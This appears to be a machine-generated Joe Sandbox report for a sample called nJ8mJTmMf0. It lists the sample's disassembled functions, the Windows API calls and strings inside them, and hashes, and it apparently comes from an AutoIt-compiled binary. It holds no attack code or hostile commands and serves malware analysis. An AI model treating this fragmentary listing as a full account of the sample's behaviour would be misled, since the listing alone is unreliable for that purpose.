                                                      • Part of subcall function 0068ADF1: GetWindowRect.USER32(?,?), ref: 0068AE90
                                                      • Part of subcall function 0068ADF1: PtInRect.USER32(?,?,0068C304), ref: 0068AEA0
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068C980
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0068C98B
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0068C9AE
                                                    • _wcscat.LIBCMT ref: 0068C9DE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0068C9F5
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0068CA0E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0068CA25
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0068CA47
                                                    • DragFinish.SHELL32(?), ref: 0068CA4E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0068CB41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$prl
                                                    • API String ID: 169749273-2548919611
                                                    • Opcode ID: df7664251fdcdfaf883e787ec339e8e7aeff72e9dc0ab038bd1dc10e6a071d2b
                                                    • Instruction ID: 206e3c8f79637a1f1ba0285e745873d31c9e6f4d1b8c6ecee9477a3cc178ad57
                                                    • Opcode Fuzzy Hash: df7664251fdcdfaf883e787ec339e8e7aeff72e9dc0ab038bd1dc10e6a071d2b
                                                    • Instruction Fuzzy Hash: EC616C71148301AFC705EF64DC85D9FBBEAEF89710F000A2EF591971A1DB709A49CB66
                                                    Function 0065B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                    • API String ID: 1038674560-1810252412
                                                    • Opcode ID: a316876991018ff1c39442aec28c8a018f0a22db412bc5dfe9fdbf653c7a0426
                                                    • Instruction ID: a6057d0fd8f38627333352cd18c6c6dde17c9c4a7b6014adc20e428dd85d285a
                                                    • Opcode Fuzzy Hash: a316876991018ff1c39442aec28c8a018f0a22db412bc5dfe9fdbf653c7a0426
                                                    • Instruction Fuzzy Hash: C531DC70A84215A6DB18FA60CD83EFE77A79F20751F60002DB901721D2EF616F09CAB9
                                                    Function 0065C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadIconW.USER32(00000063), ref: 0065C4D4
                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0065C4E6
                                                    • SetWindowTextW.USER32(?,?), ref: 0065C4FD
                                                    • GetDlgItem.USER32(?,000003EA), ref: 0065C512
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0065C518
                                                    • GetDlgItem.USER32(?,000003E9), ref: 0065C528
                                                    • SetWindowTextW.USER32(00000000,?), ref: 0065C52E
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0065C54F
                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0065C569
                                                    • GetWindowRect.USER32(?,?), ref: 0065C572
                                                    • SetWindowTextW.USER32(?,?), ref: 0065C5DD
                                                    • GetDesktopWindow.USER32 ref: 0065C5E3
                                                    • GetWindowRect.USER32(00000000), ref: 0065C5EA
                                                    • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0065C636
                                                    • GetClientRect.USER32(?,?), ref: 0065C643
                                                    • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0065C668
                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0065C693
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                    • String ID:
                                                    • API String ID: 3869813825-0
                                                    • Opcode ID: 93fd9a2d3c43ef5da052559a4b0ab241c5ecde9e9f6e59b8763764d83da93055
                                                    • Instruction ID: 68a4f0b6a7d590afdbee6ecc3d0faa17c89d5cd2315671cbcaee17703e5bf58d
                                                    • Opcode Fuzzy Hash: 93fd9a2d3c43ef5da052559a4b0ab241c5ecde9e9f6e59b8763764d83da93055
                                                    • Instruction Fuzzy Hash: 9E517370900709AFDB20DFA8DD85FAEBBF6FF04715F004628E646A26A0D774B955CB50
                                                    Function 0068A428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 0068A4C8
                                                    • DestroyWindow.USER32(?,?), ref: 0068A542
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0068A5BC
                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0068A5DE
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A5F1
                                                    • DestroyWindow.USER32(00000000), ref: 0068A613
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00600000,00000000), ref: 0068A64A
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0068A663
                                                    • GetDesktopWindow.USER32 ref: 0068A67C
                                                    • GetWindowRect.USER32(00000000), ref: 0068A683
                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0068A69B
                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0068A6B3
                                                      • Part of subcall function 006025DB: GetWindowLongW.USER32(?,000000EB), ref: 006025EC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                    • String ID: 0$tooltips_class32
                                                    • API String ID: 1297703922-3619404913
                                                    • Opcode ID: 2fea8ec370afa2ca42304f20dc928f3e6274929bca153504fadca21b1a8bad55
                                                    • Instruction ID: c9274879256fdc6fbd8eaefde5556a35998c73bd55949886d8c37726b845fb46
                                                    • Opcode Fuzzy Hash: 2fea8ec370afa2ca42304f20dc928f3e6274929bca153504fadca21b1a8bad55
                                                    • Instruction Fuzzy Hash: E2716E71140205AFE724DF68CC49FA677E6FB98304F08462DF985873A0E771E982CB66
                                                    Function 00684619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CharUpperBuffW.USER32(?,?), ref: 006846AB
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006846F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: BuffCharMessageSendUpper
                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                    • API String ID: 3974292440-4258414348
                                                    • Opcode ID: 097989a515bf32050dde063ca7a49063a5eee5f6fca1ad1e0ab3fce44e777e93
                                                    • Instruction ID: 1a206b206a0fad234641eed0d84c43f02245617273f2360925ce578826360576
                                                    • Opcode Fuzzy Hash: 097989a515bf32050dde063ca7a49063a5eee5f6fca1ad1e0ab3fce44e777e93
                                                    • Instruction Fuzzy Hash: C6918E742047129FCB58EF14C451AAABBA3AF44314F04495CF8965B7A3DF30ED4ACB95
                                                    Function 0068BAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0068BB6E
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00686D80,?), ref: 0068BBCA
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068BC03
                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0068BC46
                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0068BC7D
                                                    • FreeLibrary.KERNEL32(?), ref: 0068BC89
                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0068BC99
                                                    • DestroyIcon.USER32(?), ref: 0068BCA8
                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0068BCC5
                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0068BCD1
                                                      • Part of subcall function 0062313D: __wcsicmp_l.LIBCMT ref: 006231C6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                    • String ID: .dll$.exe$.icl
                                                    • API String ID: 1212759294-1154884017
                                                    • Opcode ID: 48abb82bba15fb2a3a90186495df73cfc755e5eb608737f208f7ad22aa9dbea1
                                                    • Instruction ID: 7836a896c344f4f1cd61ee364af8592a1f4f068bd61d1ad38978ef9e00576f08
                                                    • Opcode Fuzzy Hash: 48abb82bba15fb2a3a90186495df73cfc755e5eb608737f208f7ad22aa9dbea1
                                                    • Instruction Fuzzy Hash: 8461EF71640619BAEB14EF64DC45FFE77AAFB08710F10521AF815D61D0DBB4A990CBA0
                                                    Function 0066A0B5 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 156COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadStringW.USER32(00000066,?,00000FFF,0068FB78), ref: 0066A0FC
                                                      • Part of subcall function 00607F41: _memmove.LIBCMT ref: 00607F82
                                                    • LoadStringW.USER32(?,?,00000FFF,?), ref: 0066A11E
                                                    • __swprintf.LIBCMT ref: 0066A177
                                                    • __swprintf.LIBCMT ref: 0066A190
                                                    • _wprintf.LIBCMT ref: 0066A246
                                                    • _wprintf.LIBCMT ref: 0066A264
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: LoadString__swprintf_wprintf$_memmove
                                                    • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%i
                                                    • API String ID: 311963372-1370302273
                                                    • Opcode ID: 891635f0552f6ebc8eec4927f4db284c13eb21b380f69e6d6e9c0b41d8d8accb
                                                    • Instruction ID: 6062f160bdf26796652e141b5d4ed16c34cacddb28a6d23e7fbf3340fd918d86
                                                    • Opcode Fuzzy Hash: 891635f0552f6ebc8eec4927f4db284c13eb21b380f69e6d6e9c0b41d8d8accb
                                                    • Instruction Fuzzy Hash: D9519E71940209AACF59EBE0CD92EEFB77BAF04300F140169B505721A1EB356F88DFA5
                                                    Function 0066A5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00609997: __itow.LIBCMT ref: 006099C2
                                                      • Part of subcall function 00609997: __swprintf.LIBCMT ref: 00609A0C
                                                    • CharLowerBuffW.USER32(?,?), ref: 0066A636
                                                    • GetDriveTypeW.KERNEL32 ref: 0066A683
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A6CB
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A702
                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0066A730
                                                      • Part of subcall function 00607D2C: _memmove.LIBCMT ref: 00607D66
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                    • API String ID: 2698844021-4113822522
                                                    • Opcode ID: 6d627f2d9db22c4485a6f36d4c1b27ff00cee21bb147430c5b5337d3fb6e6bbf
                                                    • Instruction ID: c9978d945a96a83fa7ab32c5f0113b691718156d857cef52d90d2c149d3a0e62
                                                    • Opcode Fuzzy Hash: 6d627f2d9db22c4485a6f36d4c1b27ff00cee21bb147430c5b5337d3fb6e6bbf
                                                    • Instruction Fuzzy Hash: 42516BB55043049FC744EF24C8818ABB7F6EF94718F04496CF886972A2DB31AE06CF52
                                                    Function 0066A45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0066A47A
                                                    • __swprintf.LIBCMT ref: 0066A49C
                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0066A4D9
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0066A4FE
                                                    • _memset.LIBCMT ref: 0066A51D
                                                    • _wcsncpy.LIBCMT ref: 0066A559
                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0066A58E
                                                    • CloseHandle.KERNEL32(00000000), ref: 0066A599
                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0066A5A2
                                                    • CloseHandle.KERNEL32(00000000), ref: 0066A5AC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                    • String ID: :$\$\??\%s
                                                    • API String ID: 2733774712-3457252023
                                                    • Opcode ID: 0b0faa9e0b9fd32a79912804358ff94df0168e566eca3048ca50a348103e3604
                                                    • Instruction ID: d6f46ca710d5ef9833e2a72820fbff65d31ac659c5bf324241f8aef099998231
                                                    • Opcode Fuzzy Hash: 0b0faa9e0b9fd32a79912804358ff94df0168e566eca3048ca50a348103e3604
                                                    • Instruction Fuzzy Hash: 1C319DB1500119ABDB20DBA0DC48FEB73BEEF88701F1041BAFA09E6160EB7097448F65
                                                    Function 0063AB1B Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                    • String ID:
                                                    • API String ID: 884005220-0
                                                    • Opcode ID: 6935831e4cb53f4ff3c599d78d56f0fff0341d3ff7c238a48877b23bd6b38bf0
                                                    • Instruction ID: fc730e267b037fa97997833a93b231cdb371e803af5acc1ff410f722ce737d8c
                                                    • Opcode Fuzzy Hash: 6935831e4cb53f4ff3c599d78d56f0fff0341d3ff7c238a48877b23bd6b38bf0
                                                    • Instruction Fuzzy Hash: 0E612672900611AFDB209FA4EC41BB9B7A7EF11321F144219E8829B3D1DF39D841DBD6
                                                    Function 0066DB04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 0066DC7B
                                                    • _wcscat.LIBCMT ref: 0066DC93
                                                    • _wcscat.LIBCMT ref: 0066DCA5
                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0066DCBA
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066DCCE
                                                    • GetFileAttributesW.KERNEL32(?), ref: 0066DCE6
                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 0066DD00
                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0066DD12
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                    • String ID: *.*
                                                    • API String ID: 34673085-438819550
                                                    • Opcode ID: a44366e83ab40e08bb3084000670bb1b3288fbdf78521886582577bd4b2c6ef3
                                                    • Instruction ID: 7aabbf3d2d232f7e1e9c6f3b1c564dcd6a5b28b0e2c759df0c2ed78c79c88df6
                                                    • Opcode Fuzzy Hash: a44366e83ab40e08bb3084000670bb1b3288fbdf78521886582577bd4b2c6ef3
                                                    • Instruction Fuzzy Hash: EB81A3B1A042459FCB64EF24C8559AEB7EABF88350F19882EF885CB351E630DD45CB52
                                                    Function 0068C49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00602612: GetWindowLongW.USER32(?,000000EB), ref: 00602623
                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0068C4EC
                                                    • GetFocus.USER32 ref: 0068C4FC
                                                    • GetDlgCtrlID.USER32(00000000), ref: 0068C507
                                                    • _memset.LIBCMT ref: 0068C632
                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0068C65D
                                                    • GetMenuItemCount.USER32(?), ref: 0068C67D
                                                    • GetMenuItemID.USER32(?,00000000), ref: 0068C690
                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0068C6C4
                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0068C70C
                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0068C744
                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0068C779
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1661922875.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                    • Associated: 00000000.00000002.1661909963.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661963336.00000000006B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1661995191.00000000006BF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1662007506.00000000006C8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_600000_nJ8mJTmMf0.jbxd
                                                    Similarity
                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                    • String ID: 0
                                                    • API String ID: 1296962147-4108050209
                                                    • Opcode ID: e12ff08f6cf2f616a6db54b55232cc39fc24e594a37725d817c719af05d88319
                                                    • Instruction ID: d574727d6eccf06ba77c5a1824a86bb534a89ff516c64d15162ebe1a12229806
                                                    • Opcode Fuzzy Hash: e12ff08f6cf2f616a6db54b55232cc39fc24e594a37725d817c719af05d88319
                                                    • Instruction Fuzzy Hash: 8A817E70208315AFDB10EF14C984AABBBE6FF88324F104A2DF99597291D770D945CFA6
                                                    Function 006583F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00658766
                                                      • Part of subcall function 0065874A: GetLastError.KERNEL32(?,0065822A,?,?,?), ref: 00658770
                                                      • Part of subcall function 0065874A: GetProcessHeap.KERNEL32(00000008,?,?,0065822A,?,?,?), ref: 0065877F
                                                      • Part of subcall function 0065874A: HeapAlloc.KERNEL32(00000000,?,0065822A,?,?,?), ref: 00658786
                                                      • Part of subcall function 0065874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0065879D
                                                      • Part of subcall function 006587E7: GetProcessHeap.KERNEL32(00000008,00658240,00000000,00000000,?,00658240,?), ref: 006587F3
                                                      • Part of subcall function 006587E7: HeapAlloc.KERNEL32(00000000,?,00658240,?), ref: 006587FA
                                                      • Part of subcall function 006587E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00658240,?), ref: 0065880B
                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00658458
                                                    • _memset.LIBCMT ref: 0065846D
                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0065848C
                                                    • GetLengthSid.ADVAPI32(?), ref: 0065849D
                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 006584DA
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006584F6
                                                    • GetLengthSid.ADVAPI32(?), ref: 00658513
                                                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00658522
                                                    • HeapAlloc.KERNEL32(00000000), ref: 00658529
                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0065854A
                                                    • CopySid.ADVAPI32(00000000), ref: 00658551
                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00658582
                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006585A8
